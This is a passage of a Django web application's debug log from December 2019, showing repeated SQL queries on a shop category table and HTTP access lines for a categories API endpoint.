"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:17:03,962 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:17:03,966 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:17:03,971 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:17:03,974 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:17:03] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:17:03,991 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 07:17:03,996 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) [20/Dec/2019 07:17:04] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-20 07:17:04,244 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:17:04,251 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:17:04,256 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:17:04,259 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:17:04,263 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:17:04,266 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:17:04,269 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:17:04,272 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:17:04,275 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:17:04,279 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:17:04,282 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:17:04,285 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:17:04,288 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:17:04,291 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:17:04,296 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:17:04,299 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:17:04,303 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:17:04,306 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:17:04,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:17:04,316 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:17:04,319 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:17:04,323 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:17:04,326 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:17:04,328 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:17:04,331 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:17:04,335 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:17:04,338 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:17:04,340 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:17:04,342 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:17:04,345 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:17:04,349 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:17:04,352 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:17:04,354 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:17:04,357 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:17:04,359 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:17:04,363 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:17:04,366 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:17:04,368 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:17:04,370 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:17:04,372 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:17:04,374 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:17:04,377 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:17:04,380 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:17:04,382 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:17:04,385 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:17:04,387 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:17:04] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:17:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:23:09,932 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:23:09,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:23:09,950 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:23:09,954 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:23:09,957 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:23:09,959 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:23:09,961 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:23:09,964 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:23:09,966 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:23:09,969 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:23:09,971 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:23:09,974 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:23:09,976 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:23:09,978 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:23:09,981 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" 